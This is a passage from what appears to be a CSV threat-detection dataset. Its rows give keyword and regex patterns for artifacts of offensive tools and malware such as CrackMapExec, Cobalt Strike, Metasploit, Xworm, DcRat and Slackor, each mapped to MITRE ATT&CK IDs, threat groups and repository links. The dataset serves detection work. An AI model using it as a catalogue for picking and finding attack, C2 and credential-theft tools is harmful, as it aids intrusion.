T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38518" "*cme_runasppl_output_*.txt*",".{0,1000}cme_runasppl_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability 
checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38519" "*cme_shadowcoerce_output_*.txt*",".{0,1000}cme_shadowcoerce_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38520" "*cme_smb_enum*",".{0,1000}cme_smb_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38521" "*cme_smbsigning_output_*.txt*",".{0,1000}cme_smbsigning_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38522" "*cme_subnets_output_*.txt*",".{0,1000}cme_subnets_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability 
checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38523" "*cme_trusted-for-delegation_output_*",".{0,1000}cme_trusted\-for\-delegation_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38524" "*cme_users_auth_ldap_*.txt*",".{0,1000}cme_users_auth_ldap_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38525" "*cme_users_auth_smb_*.txt*",".{0,1000}cme_users_auth_smb_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38526" "*cme_users_nullsess_smb_*.txt*",".{0,1000}cme_users_nullsess_smb_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active 
Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38527" "*cme_webdav_output_*.txt*",".{0,1000}cme_webdav_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38528" "*cme_zerologon_output_*.txt*",".{0,1000}cme_zerologon_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38529" "*cme-macOS-latest-*.zip*",".{0,1000}cme\-macOS\-latest\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential 
Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38530" "*cme-ubuntu-latest-*.zip*",".{0,1000}cme\-ubuntu\-latest\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38531" "*cme-windows-latest-*.zip*",".{0,1000}cme\-windows\-latest\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38532" "*CMLoot.psm1*",".{0,1000}CMLoot\.psm1.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","38533" "*CMLoot-main*",".{0,1000}CMLoot\-main.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on 
(System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","38534" "*cmpivot.py*",".{0,1000}cmpivot\.py.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","N/A","9","8","750","97","2025-04-03T15:58:02Z","2023-02-20T14:09:42Z","38535" "*cms400net_default_userpass*",".{0,1000}cms400net_default_userpass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38536" "*Cmstp-Bypass.dll*",".{0,1000}Cmstp\-Bypass\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","38537" "*Cmstp-Bypass.pdb*",".{0,1000}Cmstp\-Bypass\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","38538" "*CmstpElevatedCOM*",".{0,1000}CmstpElevatedCOM.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","38539" 
"*cmVmbGVjdGl2ZQ==*",".{0,1000}cmVmbGVjdGl2ZQ\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38540" "*CN=DcRat Server*OU=qwqdanchun*O=DcRat By qwqdanchun*",".{0,1000}CN\=DcRat\sServer.{0,1000}OU\=qwqdanchun.{0,1000}O\=DcRat\sBy\sqwqdanchun.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","38541" "*CN=PortSwigger*",".{0,1000}CN\=PortSwigger.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. 
and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","38542" "*CN=ShadowSpray*",".{0,1000}CN\=ShadowSpray.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","38543" "*cnotin/SplunkWhisperer2*",".{0,1000}cnotin\/SplunkWhisperer2.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","38544" "*Coalfire-Research/Slackor*",".{0,1000}Coalfire\-Research\/Slackor.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","38545" "*Coalfire-Research/Slackor*",".{0,1000}Coalfire\-Research\/Slackor.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","38546" "*Cobalt Strike external C2*",".{0,1000}Cobalt\sStrike\sexternal\sC2.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","38547" "*Cobalt Strike*",".{0,1000}Cobalt\sStrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - 
FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38548" "*cobaltclip.cna*",".{0,1000}cobaltclip\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE 
STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","","N/A","","","","38549" "*cobaltclip.exe*",".{0,1000}cobaltclip\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","","N/A","","","","38550" "*cobaltstrike*",".{0,1000}cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","cobaltstrike binary for windows - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and 
techniques of an advanced adversary in a network. While penetration tests focus on unpatched vulnerabilities and misconfigurations. these assessments benefit security operations and incident response.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38551" "*cobalt-strike*",".{0,1000}cobalt\-strike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38552" "*cobaltstrike.store*",".{0,1000}cobaltstrike\.store.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","38554" "*Cobalt-Strike/bof_template*",".{0,1000}Cobalt\-Strike\/bof_template.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - 